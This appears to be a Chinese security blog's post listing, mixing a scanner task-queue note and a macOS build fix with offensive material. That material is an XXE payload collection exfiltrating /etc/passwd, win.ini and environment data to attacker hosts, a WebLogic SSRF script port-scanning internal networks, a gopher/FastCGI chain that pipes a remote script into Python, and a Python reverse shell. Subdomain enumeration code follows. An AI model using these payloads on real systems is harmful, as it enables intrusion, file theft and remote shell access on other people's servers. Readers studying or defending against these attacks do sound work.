        r = requests.get(URL, timeout=15, verify=False)
        if r.status_code == 200:
            return exploit(URL, Thread)
    except Exception as e:
        #print str(e)
        return

def ip2host_get(scan_type,host,port):
    ip2hosts = []
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), timeout=45, verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item.replace('://','///').replace(':','~'))
    except Exception, e:
        print str(e)
        pass
    return ip2hosts

再次修改了其中的顺序,

    def run(self):
        while True:
            queue_task = self.queue.get()
            task_type,task_host,task_port = queue_task.split(":")
            if task_type == 'portscan':
                port_status = scan_port(task_type,task_host,task_port)
                if port_status == True:
                    #如果端口开发,推送到任务
                    queue.put(":".join(['ip2host_get',task_host,task_port]))
            elif task_type == 'ip2host_get':
                #针对存货IP发起旁站查询
                result = []
                urls = ip2host_get(task_type,task_host,task_port)
                #queue.put(":".join(['discern',task_host,task_port]))
                urls.insert(0,task_host)
                result.extend(urls)
                urls = list(set(result))
                if len(urls)>0:
                    #list can not use find
                    for url in urls:
                        if len(url)>0:
                            #print url
                            #put url in queue,but some qestion in Threads and queue
                            queue.put(":".join(['whatcms',str(url),task_port]))
            elif task_type == 'whatcms':
                cms = whatcms(task_type,task_host,task_port)
                queue.put(":".join(['discern',task_host,task_port]))
                if cms == None:
                    "go on 但是没什么乱用"
                    #以后增加插件式扫描

            elif task_type == 'discern':
                #针对中间件的识别
                discern_type = scan_discern(task_type,task_host,task_port)
                if discern_type:
                    queue.put(":".join([discern_type,task_host,task_port]))
            else:
                scan_vul(task_type,task_host,task_port)
            self.queue.task_done()

但是问题来了,线程经常性的奔溃掉,然后就无奈了

然后发现了一个有意思的东西https://raw.githubusercontent.com/erevus-cn/pocscan/master/web/tasks.py

# coding:utf-8
import gevent
from gevent.pool import Pool
from web.lib.utils import *
from pocscan.poc_launcher import Poc_Launcher
from celery import Celery, platforms

app = Celery()

# 允许celery以root权限启动
platforms.C_FORCE_ROOT = True

# 修改celery的全局配置
app.conf.update(
    CELERY_IMPORTS = ("tasks", ),
    BROKER_URL = 'amqp://guest:guest@localhost:5672/',
    CELERY_RESULT_BACKEND = 'db+mysql://root:123456@127.0.0.1:3306/pocscan',
    CELERY_TASK_SERIALIZER='json',
    CELERY_RESULT_SERIALIZER='json',
    CELERY_TIMEZONE='Asia/Shanghai',
    CELERY_ENABLE_UTC=True,
    BROKER_TRANSPORT_OPTIONS = {'visibility_timeout': 3600}, # 如果任务没有在 可见性超时 内确认接收,任务会被重新委派给另一个Worker并执行  默认1 hour.
    CELERYD_CONCURRENCY = 50 ,
    CELERY_TASK_RESULT_EXPIRES = 1200,  # celery任务执行结果的超时时间,我的任务都不需要返回结
    # BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True},       # 设置一个传输选项来给消息加上前缀
)

# 失败任务重启休眠时间300秒,最大重试次数5次
#@app.task(bind=True, default_retry_delay=300, max_retries=5)
@app.task(time_limit=3600)
def run_task_in_gevent(url_list, poc_file_dict):     # url_list 每个进程分配到一定量的url
    poc = Poc_Launcher()
    pool = Pool(100)
    for target in url_list:
        for plugin_type,poc_files in poc_file_dict.iteritems():
            for poc_file in poc_files:
                if target and poc_file:
                    target = fix_target(target)
                    pool.add(gevent.spawn(poc.poc_verify, target, plugin_type, poc_file))
    pool.join()

搜了下Celery,专门用于解决任务队列用于分发工作给不同线程。回头研究下

 

参考文章:

http://docs.jinkan.org/docs/celery/
http://my.oschina.net/u/2306127/blog/417360
http://rfyiamcool.blog.51cto.com/1030776/1325062
http://www.tuicool.com/articles/qi6Nve

MacOSX安装autopy时遇到错误

发布时间:March 2, 2016 // 分类:工作日志,运维工作,开发笔记,python,windows,转帖文章 // No Comments

spynner是一个QtWebKit的客户端,它可以模拟浏览器,完成加载页面、引发事件、填写表单等操作。

这个模块可以在Python的官网找到。

下载地址: https://pypi.python.org/pypi/spynner/2.5

解压后,cd到安装目录,然后输入sudo python configure.py install安装该模块。

这样Spynner模块就安装完成了,在python shell中试试import spynner看看该模块有没有安装完成。

其实是安装spynner的时候遇到的.习惯的使用pip去安装了pip install spynner的时候发现了这个错误

src/screengrab.c:48:26: warning: implicit declaration of function 'CGDisplayBitsPerPixel' is invalid in C99
      [-Wimplicit-function-declaration]
        bitsPerPixel = (uint8_t)CGDisplayBitsPerPixel(displayID);
                                ^
src/screengrab.c:174:15: warning: 'kCGLPFAFullScreen' is deprecated: first deprecated in OS X 10.6 [-Wdeprecated-declarations]
        attribs[0] = kCGLPFAFullScreen;
                     ^
/System/Library/Frameworks/OpenGL.framework/Headers/CGLTypes.h:71:2: note: 'kCGLPFAFullScreen' declared here
        kCGLPFAFullScreen OPENGL_ENUM_DEPRECATED(10_0, 10_6)     =  54,
        ^
src/screengrab.c:191:2: warning: 'CGLSetFullScreen' is deprecated: first deprecated in OS X 10.6 [-Wdeprecated-declarations]
        CGLSetFullScreen(glContext);
        ^
/System/Library/Frameworks/OpenGL.framework/Headers/OpenGL.h:73:17: note: 'CGLSetFullScreen' declared here
extern CGLError CGLSetFullScreen(CGLContextObj ctx) OPENGL_DEPRECATED(10_0, 10_6);
                ^
src/screengrab.c:194:2: warning: implicit declaration of function 'glReadBuffer' is invalid in C99 [-Wimplicit-function-declaration]
        glReadBuffer(GL_FRONT);
        ^
src/screengrab.c:194:15: error: use of undeclared identifier 'GL_FRONT'
        glReadBuffer(GL_FRONT);
                     ^
src/screengrab.c:197:2: warning: implicit declaration of function 'glFinish' is invalid in C99 [-Wimplicit-function-declaration]
        glFinish();
        ^
src/screengrab.c:199:6: warning: implicit declaration of function 'glGetError' is invalid in C99 [-Wimplicit-function-declaration]
        if (glGetError() != GL_NO_ERROR) return NULL;
            ^
src/screengrab.c:199:22: error: use of undeclared identifier 'GL_NO_ERROR'
        if (glGetError() != GL_NO_ERROR) return NULL;
                            ^
src/screengrab.c:207:2: warning: implicit declaration of function 'glPopClientAttrib' is invalid in C99
      [-Wimplicit-function-declaration]
        glPopClientAttrib(); /* Clear attributes previously set. */
        ^
src/screengrab.c:223:2: warning: implicit declaration of function 'glPushClientAttrib' is invalid in C99
      [-Wimplicit-function-declaration]
        glPushClientAttrib(GL_CLIENT_PIXEL_STORE_BIT);
        ^
src/screengrab.c:223:21: error: use of undeclared identifier 'GL_CLIENT_PIXEL_STORE_BIT'
        glPushClientAttrib(GL_CLIENT_PIXEL_STORE_BIT);
                           ^
src/screengrab.c:225:2: warning: implicit declaration of function 'glPixelStorei' is invalid in C99 [-Wimplicit-function-declaration]
        glPixelStorei(GL_PACK_ALIGNMENT, BYTE_ALIGN); /* Force alignment. */
        ^
src/screengrab.c:225:16: error: use of undeclared identifier 'GL_PACK_ALIGNMENT'
        glPixelStorei(GL_PACK_ALIGNMENT, BYTE_ALIGN); /* Force alignment. */
                      ^
src/screengrab.c:226:16: error: use of undeclared identifier 'GL_PACK_ROW_LENGTH'
        glPixelStorei(GL_PACK_ROW_LENGTH, 0);
                      ^
src/screengrab.c:227:16: error: use of undeclared identifier 'GL_PACK_SKIP_ROWS'
        glPixelStorei(GL_PACK_SKIP_ROWS, 0);
                      ^
src/screengrab.c:228:16: error: use of undeclared identifier 'GL_PACK_SKIP_PIXELS'
        glPixelStorei(GL_PACK_SKIP_PIXELS, 0);
                      ^
src/screengrab.c:235:2: warning: implicit declaration of function 'glReadPixels' is invalid in C99 [-Wimplicit-function-declaration]
        glReadPixels(x, y, width, height,
        ^
src/screengrab.c:236:30: error: use of undeclared identifier 'GL_BGRA'
                     MMRGB_IS_BGR ? GL_BGRA : GL_RGBA,
                                    ^
src/screengrab.c:236:40: error: use of undeclared identifier 'GL_RGBA'
                     MMRGB_IS_BGR ? GL_BGRA : GL_RGBA,
                                              ^
10 warnings and 9 errors generated.
error: Setup script exited with error: command 'cc' failed with exit status 1

仔细看了下发现是autopy的错误,查看src/screengrab.c发现是由于OpenGL没有更新版本,存在一些已经被弃用的方法。解决办法很简单,安装libpng,下载地址。安装完成后发现还是继续报错

git clone git://github.com/msanders/autopy.git
cd autopy
python setup.py build
src/png_io.c:3:10: fatal error: 'png.h' file not found  
#include <png.h>  
         ^  
1 error generated.  
error: command 'cc' failed with exit status 1  

解决办法很简单..直接指向就好了


export LIBRARY_PATH="/usr/local/lib:/usr/local/include/libpng"
export C_INCLUDE_PATH="/usr/local/lib:/usr/local/include/libpng"
python setup.py build
sudo python setup.py install

 

XML Entity Cheatsheet - Updated

发布时间:February 22, 2016 // 分类:开发笔记,工作日志,linux,转帖文章,windows // No Comments

An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.

XML Headers:

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>

Parameter Entity. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd">%dtd]>

Should be illegal per XML specs but I've seen it work, also useful for DoS:
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>

Combined Entity and Parameter Entity:

 

<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

URL handler. This follows XML Entity - IBM (Broken) I have not used this but Public DTD works just as well:

<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

madeuptag xlmns="http://[ip]" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote Public DTD, from oxml_xxe payloads:

<!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://[IP]">

External XML Stylesheet, from Burp Suite Release Notes:

<?xml-stylesheet type="text/xml" href="http://[IP]"?>

XInclude:

<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

Inline XSLT:

<?xml-stylesheet type="text/xml" href="#mytest"?>
<xsl:stylesheet id="mytest" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<!-- replace with your XSLT attacks -->
<xsl:import href="http://[ip]"/>
<xsl:template match="id('boom')">
  <fo:block font-weight="bold"><xsl:apply-templates/></fo:block>
</xsl:template>
</xsl:stylesheet>

Useful Links:

XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques
XML Entity Examples - IBM (Broken, check Internet Archive)

 

一些XXE_Payloads

https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67deb/XXE_payloads

Vanilla, used to verify outbound xxe or blind xxe

1
2
3
4
5
6
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

 

OoB extraction

1
2
3
4
5
6
7
8
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

External dtd:

1
2
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB variation of above (seems to work better against .NET)

1
2
3
4
5
6
7
8
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

External dtd:

1
2
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB extra nice

1
2
3
4
5
6
7
8
9
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

External dtd:

1
<!ENTITY all "%start;%stuff;%end;">

File-not-found exception based extraction

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [  
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
  %one;
  %two;
  %four;
]>

External dtd:

1
2
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> //you might need to encode this % (depends on your target) as: &#x25;

 

FTP

1
2
3
4
5
6
7
<?xml version="1.0" ?>
<!DOCTYPE a [ 
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

External dtd:

1
2
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

Inside SOAP body

1
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

Untested - WAF Bypass

1
2
3
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

WebLogic SSRF简易的利用脚本

发布时间:November 16, 2015 // 分类:开发笔记,代码学习,linux,python,windows // No Comments

#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

这个漏洞可以对内网进行扫描.之前弄过简单的探测,时间久远就给忘记了

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

import re
import urlparse

def assign(service, arg):
    if service == 'www':
        return True, arg


def audit(arg):
    payload = 'uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl('"%s"' % url)
    m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException', res)
    if m:
        security_warning(url)

if __name__ == '__main__':
    from dummy import *
    audit(assign('www', 'http://www.example.com/')[1])

但是最近因为有需求.要列出内网的部分信息。于是就修改了这个脚本,方便大批量的扫描应用

#!/usr/bin/env python  
# -*- coding: utf-8 -*- 
import re
import sys
import time
import thread
import requests
 
def scan(ip_str):
    ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)
    for port in ports:
        exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
            #SSRF判断
            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)
            #丢失连接.端口连接不上
            re_sult2 = re.findall('but could not connect',response.content)

            if len(re_sult1)!=0 and len(re_sult2)==0:
                print ip_str+':'+port

        except Exception, e:
            pass
        
def find_ip(ip_prefix):
    '''
    给出当前的192.168.1 ,然后扫描整个段所有地址
    '''
    for i in range(1,256):
        ip = '%s.%s'%(ip_prefix,i)
        thread.start_new_thread(scan, (ip,))
        time.sleep(3)
     
if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
   
    ip_prefix = '.'.join(args.split('.')[:-1])
    find_ip(ip_prefix)

得到的结果

10.101.28.16:80
10.101.28.17:80
10.101.28.16:135
10.101.28.16:139
10.101.28.17:135
10.101.28.16:445
10.101.28.17:445
10.101.28.20:80
10.101.28.20:135
10.101.28.20:139
10.101.28.129:80
10.101.28.202:21
10.101.28.142:139
10.101.28.142:445
10.101.28.129:135
10.101.28.202:80
10.101.28.240:21
10.101.28.142:3389
10.101.28.142:7001

 

前不久尝试了一个有php+weblogic+FastCGI的挑战.我们知道SSRF+GOPHER一直都很牛逼,最近更是火热到了不要不要的地步。在drops里面有关于这个的文章http://drops.wooyun.org/tips/16357。简单的说下利用步骤

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"
php -f gopher.php

把payload保存到x.txt。bash反弹无效,改成python来反弹。然后urlencode编码payload生成ssrf.php

shell.py

import socket,subprocess,os  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect(("yourip",9999))  
os.dup2(s.fileno(),0)  
os.dup2(s.fileno(),1)  
os.dup2(s.fileno(),2)  
p=subprocess.call(["/bin/bash","-i"]);

gopher.php

<?php
$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));
file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");
?>

成功生成了利用文件ssrf.php

反弹shell

vps上运行监听端口

nc -lvv 9999

利用SSRF

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&amp;rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business%20location&amp;btnSubmit=Search&amp;operator=YOURIP/ssrf.php

如果利用成功则会成功反弹

1
```

调用第三方进行子域名查询

发布时间:November 8, 2015 // 分类:开发笔记,工作日志,linux,python,windows,生活琐事 // 1 Comment

因为最近都是使用的是subDomainsBrute.py对子域名进行爆破。但是三级域名的支持却不是很好。有小伙伴提示是在http://i.links.cn/subdomain/上进行查询的。于是简单的测试了下,写了一个小脚本方便查询

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import requests,re,sys

def get_domain(domain):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://i.links.cn/subdomain/",
    }
    payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
    r = requests.post("http://i.links.cn/subdomain/", params=payload)
    file=r.text.encode('ISO-8859-1')
    regex = re.compile('value="(.+?)"><input')
    result=regex.findall(file)
    list = '\n'.join(result)
    print list

if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
    get_domain(args)

对比了下。还真的处了三级域名

#!/usr/bin/env python
# encoding: utf-8

import re
import sys
import json
import time
import socket
import random
import urllib
import urllib2

from bs4 import BeautifulSoup

# 随机AGENT
USER_AGENTS = [
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
]


def random_useragent():
    return random.choice(USER_AGENTS)

def getUrlRespHtml(url):
    respHtml=''
    try:
        heads = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 
                'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7', 
                'Accept-Language':'zh-cn,zh;q=0.5', 
                'Cache-Control':'max-age=0', 
                'Connection':'keep-alive', 
                'Keep-Alive':'115',
                'User-Agent':random_useragent()}
     
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
        urllib2.install_opener(opener) 
        req = urllib2.Request(url)
        opener.addheaders = heads.items()
        respHtml = opener.open(req).read()
    except Exception:
        pass
    return respHtml

def links_get(domain):
    trytime = 0
    #links里面得到的数据不是很全,准确率没法保证
    domainslinks = []
    try:
        req=urllib2.Request('http://i.links.cn/subdomain/?b2=1&b3=1&b4=1&domain='+domain)
        req.add_header('User-Agent',random_useragent())
        res=urllib2.urlopen(req, timeout = 30)
        src=res.read()

        TempD = re.findall('value="http.*?">',src,re.S)
        for item in TempD:
            item = item[item.find('//')+2:-2]
            #result=socket.getaddrinfo(item,None)
            #print result[0][4]
            domainslinks.append(item)
            domainslinks={}.fromkeys(domainslinks).keys()
        return domainslinks

    except Exception, e:
        pass
        trytime += 1
        if trytime > 3:
            return domainslinks

def bing_get(domain):
    trytime = 0
    f = 1
    domainsbing = []
    #bing里面获取的数据不是很完全
    while True:
        try:            
            req=urllib2.Request('http://cn.bing.com/search?count=50&q=site:'+domain+'&first='+str(f))
            req.add_header('User-Agent',random_useragent()) 
            res=urllib2.urlopen(req, timeout = 30)
            src=res.read()
            TempD=re.findall('<cite>(.*?)<\/cite>',src)
            for item in TempD:
                item=item.split('<strong>')[0]
                item += domain
                try:
                    if not (item.startswith('http://') or item.startswith('https://')):
                        item = "http://" + item
                    proto, rest = urllib2.splittype(item)
                    host, rest = urllib2.splithost(rest) 
                    host, port = urllib2.splitport(host)
                    if port == None:
                        item = host
                    else:
                        item = host + ":" + port
                except:
                     print traceback.format_exc()
                     pass                           
                domainsbing.append(item)         
            if f<500 and re.search('class="sb_pagN"',src) is not None:
                f = int(f)+50
            else:
                subdomainbing={}.fromkeys(domainsbing).keys()
                return subdomainbing
                break
        except Exception, e:
            pass
            trytime+=1
            if trytime>3:
                return domainsbing

def google_get(domain):
    trytime = 0
    s=1
    domainsgoogle=[]
    #需要绑定google的hosts
    while True:
        try:
            req=urllib2.Request('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=site:'+domain+'&rsz=8&start='+str(s))
            req.add_header('User-Agent',random_useragent()) 
            res=urllib2.urlopen(req, timeout = 30)
            src=res.read()
            results = json.loads(src)
            TempD = results['responseData']['results']
            for item in TempD:
                item=item['visibleUrl'] 
                item=item.encode('utf-8')
                domainsgoogle.append(item)                
            s = int(s)+8
        except Exception, e:
            trytime += 1
            if trytime >= 3:
                domainsgoogle={}.fromkeys(domainsgoogle).keys()
                return domainsgoogle 

def Baidu_get(domain):
    domainsbaidu=[]
    try:
        pg = 10
        for x in xrange(1,pg):
            rn=50
            pn=(x-1)*rn
            url = 'http://www.baidu.com/baidu?cl=3&tn=baidutop10&wd=site:'+domain.strip()+'&rn='+str(rn)+'&pn='+str(pn)
            src=getUrlRespHtml(url)
            soup = BeautifulSoup(src)
            html=soup.find('div', id="content_left")
            if html:
                html_doc=html.find_all('h3',class_="t")
                if html_doc:
                    for doc in html_doc:
                        href=doc.find('a')
                        link=href.get('href')
                        #需要第二次请求,从302里面获取到跳转的地址[速度很慢]
                        rurl=urllib.unquote(urllib2.urlopen(link.strip()).geturl()).strip()
                        reg='http:\/\/[^\.]+'+'.'+domain
                        match_url = re.search(reg,rurl)
                        if match_url:
                            item=match_url.group(0).replace('http://','')
                            domainsbaidu.append(item)
    except Exception, e:
        pass
        domainsbaidu={}.fromkeys(domainsbaidu).keys()

    return domainsbaidu

def get_360(domain):
    #从360获取的数据一般都是网站管理员自己添加的,所以准备率比较高。
    domains360=[]
    try:
        url = 'http://webscan.360.cn/sub/index/?url='+domain.strip()
        src=getUrlRespHtml(url)
        item = re.findall(r'\)">(.*?)</strong>',src)
        if len(item)>0:
            for i in xrange(1,len(item)):
                domains360.append(item[i])
        else:
            item = ''
            domains360.append(item)
    except Exception, e:
        pass
        domains360={}.fromkeys(domains360).keys()
    return domains360

def get_subdomain_run(domain):
    mydomains = []
    mydomains.extend(links_get(domain))
    mydomains.extend(bing_get(domain))
    mydomains.extend(Baidu_get(domain))
    mydomains.extend(google_get(domain))
    mydomains.extend(get_360(domain))
    mydomains = list(set(mydomains))

    return mydomains

if __name__ == "__main__":
   if len(sys.argv) == 2:
      print get_subdomain_run(sys.argv[1])
      sys.exit(0)
   else:
       print ("usage: %s domain" % sys.argv[0])
       sys.exit(-1)

 

python mysubdomain.py wooyun.org
['www.wooyun.org', 'zone.wooyun.org', 'summit.wooyun.org', 'ce.wooyun.org', 'drops.wooyun.org', 'wooyun.org', 'wiki.wooyun.org', 'z.wooyun.org', 'job.wooyun.org', 'zhuanlan.wooyun.org', 'www2d00.wooyun.org', 'test.wooyun.org', 'en.wooyun.org', 'api.wooyun.org', 'paper.wooyun.org', 'edu.wooyun.org']

2016.1.28增加百度与360搜索抓取

python mysubdomain.py jd.cn

['temp1.jd.cn', 'ngb.jd.cn', 'www.fy.jd.cn', 'dangan.jd.cn', 'rd.jd.cn', 'bb.jd.cn', 'www.jd.cn', 'bjxc.jd.cn', 'www.xnz.jd.cn', 'jw.jd.cn', 'www.gsj.jd.cn', 'www.wuqiao.jd.cn', 'nlj.jd.cn', 'czj.jd.cn', 'www.smj.jd.cn', 'zfrx.jd.cn', 'www.jjjc.jd.cn', 'gtj.jd.cn', 'bbs.jd.cn', 'hbcy.jd.cn', 'lcsq.xnz.jd.cn', 'jtj.jd.cn', 'www.nkj.jd.cn', 'zx.jd.cn', 'www.daj.jd.cn', 'www.hbcy.jd.cn', 'slj.jd.cn', 'kfq.jd.cn', 'www.jxw.jd.cn', 'jwxxw.jd.cn', 'www.kx.jd.cn', 'qxj.jd.cn', 'www.sjj.jd.cn', 'www.jfw.jd.cn', 'www.dqz.jd.cn', 'yl.jd.cn', 'www.tw.jd.cn', 'www.qxj.jd.cn', 'www.dwzw.jd.cn', 'www.czj.jd.cn', 'www.ajj.jd.cn', 'www.gxs.jd.cn', 'www.dx.jd.cn', 'sjj.jd.cn', 'www.jtj.jd.cn', 'www.wjj.jd.cn', 'www.mzj.jd.cn', 'www.cgj.jd.cn', 'jsj.jd.cn', 'www.dangan.jd.cn', 'www.wlj.jd.cn', 'www.mj.jd.cn', 'www.zwz.jd.cn', 'www.sf.jd.cn', 'www.sbz.jd.cn', 'www.cl.jd.cn', 'fzb.jd.cn', 'ajj.jd.cn', 'www.rsj.jd.cn', 'www.jdz.jd.cn', 'www.xh.jd.cn', 'qzlxjysj.jd.cn', 'www.wjmj.jd.cn', 'www.sbdw.jd.cn', 'www.flower.jd.cn', 'www.kjj.jd.cn', 'www.yjj.jd.cn', 'wjj.jd.cn', 'jdz.jd.cn', 'www.cb.jd.cn', 'www.ptz.jd.cn', 'nkj.jd.cn', '333.jd.cn', 'www.dxs.jd.cn', 'www.cxy.jd.cn', 'www.wjz.jd.cn', 'www.fzb.jd.cn', 'login.jd.cn', 'ldj.jd.cn', 'jfw.jd.cn', 'www.zfcg.jd.cn', 'www.kfq.jd.cn', 'www.dhz.jd.cn', 'www.zfrx.jd.cn', 'www.rd.jd.cn', 'dxs.jd.cn', 'jggw.jd.cn', 'www.yilin.jd.cn', 'www.tjj.jd.cn', 'www.zfw.jd.cn', 'g.jd.cn', 'www.rc.jd.cn', 'yfsq.xnz.jd.cn', 'www.wqz.jd.cn', 'zfcg.jd.cn', 'fgj.jd.cn', 'hbj.jd.cn', 'fgw.jd.cn', 'www.acd.jd.cn', 'sfj.jd.cn', 'www.zx.jd.cn', 'kx.jd.cn', 'www.ylz.jd.cn', 'www.zhenwu.jd.cn', 'fcz.jd.cn', 'tjj.jd.cn', 'kjj.jd.cn', 'gjj.jd.cn', 'cl.jd.cn', 'www.njj.jd.cn', 'www.slj.jd.cn', 'www.ldj.jd.cn', 'www.jsj.jd.cn', 'zfw.jd.cn', 'news.jd.cn', 'tw.jd.cn', 'www.dgz.jd.cn', 'yjj.jd.cn', 'njj.jd.cn', 'www.jggw.jd.cn', 'www.gjj.jd.cn', 'www.kp.jd.cn', 'www.qx.jd.cn', 'lsj.jd.cn', 'www.hbj.jd.cn', 'www.gcz.jd.cn', 'rc.jd.cn', 'jd.cn', 'jgj.jd.cn', 'jjjc.jd.cn', 'www.wsj.jd.cn', 'rsj.jd.cn', 'www.syb.jd.cn', 'files.jd.cn', 'www.jgj.jd.cn', 'www.xjz.jd.cn', 'fkb.jd.cn', 'qx.jd.cn', 'gsl.jd.cn', 'ptz.jd.cn', 'zzb.jd.cn', 'www.zjj.jd.cn', 'www.rfb.jd.cn', 'cb.jd.cn', 'www.fgj.jd.cn', 'www.da.jd.cn', 'www.lsj.jd.cn', 'www.fcz.jd.cn', 'www.ngb.jd.cn', 'www.sbzs.jd.cn', 'sf.jd.cn', 'www.jsw.jd.cn']

 

分类
最新文章
最近回复
  • 没穿底裤: 直接在hosts里面.激活的时候访问不到正确的地址
  • Sfish: 屏蔽更新是在控制台设置一下就可以了,还是说要在其他层面做一下限制,比如配置一下hosts让他升...
  • 没穿底裤: 激活,或者屏蔽地址禁止升级
  • 没穿底裤: 呃..这个思路不错啊..
  • Sfish: 博主好,想问一下,wvs11的破解版,是不是每隔一段时间就要重新激活一次才可以?有没有什么解决...